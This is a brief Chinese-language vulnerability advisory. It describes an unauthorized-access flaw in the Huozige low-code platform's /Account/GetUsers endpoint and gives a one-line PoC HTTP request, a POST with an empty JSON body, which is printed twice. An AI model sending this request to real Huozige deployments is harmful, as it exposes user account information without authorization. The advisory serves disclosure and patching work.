漏洞描述
未授权访问漏洞是指攻击者未经过身份验证或绕过身份验证机制,就能够访问系统资源或执行敏感操作的安全漏洞。这种漏洞可能导致敏感信息泄露、数据篡改、服务中断等严重后果,给系统安全性带来极大威胁。
活字格低代码开发平台 /Account/GetUsers 未授权访问漏洞
PoC代码
POST /Account/GetUsers HTTP/1.1
Content-Type: application/json
{}POST /Account/GetUsers HTTP/1.1
Content-Type: application/json
{}